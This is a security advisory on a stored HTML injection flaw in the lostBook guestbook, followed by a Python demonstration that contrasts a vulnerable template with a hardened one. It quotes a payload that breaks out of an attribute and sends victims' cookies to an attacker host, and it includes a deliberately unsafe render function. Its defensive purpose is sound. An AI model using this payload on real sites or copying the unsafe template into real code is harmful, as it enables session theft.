source: https://www.securityfocus.com/bid/10825/info
Verylost lostBook is reportedly affected by an HTML injection vulnerability in its message entry functionality. The issue exists because the application does not adequately validate or sanitize user-supplied input before embedding it in dynamically generated web page content. The injected markup is stored with the post and rendered to every subsequent visitor, so this is a persistent (stored) injection rather than a reflected one.
This may allow an attacker to inject malicious HTML and script code into the application. An unsuspecting user who views the post will have the attacker-supplied script executed in their browser in the context of the vulnerable site. The issue may be leveraged to steal cookie-based authentication credentials. Other attacks are also possible.
example.com" onload="document.location='http://www.cookiestealer.com?cookie='+document.cookie

The leading double quote closes the attribute into which the supplied value is inserted, and the remainder adds an onload event handler that sends the victim's document.cookie to an attacker-controlled host. Because the injection lands inside an attribute rather than in text content, stripping or encoding only < and > does not stop it: quotes must be encoded as well, and a field that is supposed to hold a URL should be checked against an allow-list of expected forms (an absolute http or https URL) before it is ever written into the page.
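As an added illustration that is not lostBook's own code and not part of the original advisory, the following Python mimics the pattern the payload above targets: a hypothetical guestbook template that writes a visitor-supplied link field into a quoted href attribute without encoding, beside a hardened version that allow-lists the URL scheme and applies context-aware output encoding. The template, field names and sample entries are assumptions; the payload is the one quoted in the advisory. A small HTML parser reads the rendered markup back so the outcome is judged by the attributes a browser would actually see on the tag, not by eyeballing strings.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The payload quoted in the advisory above (constructed test input, copied verbatim).
PAYLOAD = ('example.com" onload="document.location='
           "'http://www.cookiestealer.com?cookie='+document.cookie")


def render_entry_vulnerable(name: str, site: str, message: str) -> str:
    """Hypothetical guestbook template that drops fields straight into markup.

    This is an illustrative stand-in, not lostBook's own code. The 'site'
    field is written into a quoted href attribute without encoding, so a
    value that starts with a double quote breaks out of the attribute.
    """
    return f'<div class="entry"><a href="{site}">{name}</a><p>{message}</p></div>'


def safe_url(url: str) -> str:
    """Allow-list check for the link field: only absolute http(s) URLs pass.

    Anything else (javascript:, data:, bare text, breakout attempts) is
    replaced with '#', so a hostile value never reaches the template.
    """
    candidate = url.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return candidate
    return "#"


def render_entry_safe(name: str, site: str, message: str) -> str:
    """Same template with allow-listing plus context-aware output encoding.

    html.escape(..., quote=True) encodes <, >, & and both quote characters,
    so a value can neither close the attribute nor start a tag in text.
    """
    return (
        '<div class="entry"><a href="{}">{}</a><p>{}</p></div>'.format(
            html.escape(safe_url(site), quote=True),
            html.escape(name, quote=True),
            html.escape(message, quote=True),
        )
    )


class _AnchorAttrs(HTMLParser):
    """Collects the attributes a browser would see on the entry's <a> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.attrs.update(attrs)


def anchor_attributes(markup: str) -> dict:
    """Parse rendered markup and return the <a> tag's attribute map.

    The attribute names are the ground truth for whether the injection
    worked: an 'onload' key means the attacker got an event handler in.
    """
    parser = _AnchorAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def script_in_text(markup: str) -> bool:
    """True if a literal <script> tag survives into the rendered output."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    body = "<script>alert(1)</script>"  # constructed message-field payload
    vuln = render_entry_vulnerable("guest", PAYLOAD, body)
    safe = render_entry_safe("guest", PAYLOAD, body)
    print("vulnerable attrs:", anchor_attributes(vuln))
    print("hardened attrs:  ", anchor_attributes(safe))
    print("script tag in vulnerable:", script_in_text(vuln),
          "| in hardened:", script_in_text(safe))
```

Run as a script, the vulnerable rendering ends up with an onload handler on the anchor while the hardened one carries only href. The two defences are deliberately layered: escaping alone keeps an injected quote inside the attribute value, and the scheme allow-list additionally rejects values such as javascript: URLs that escaping would pass through unchanged.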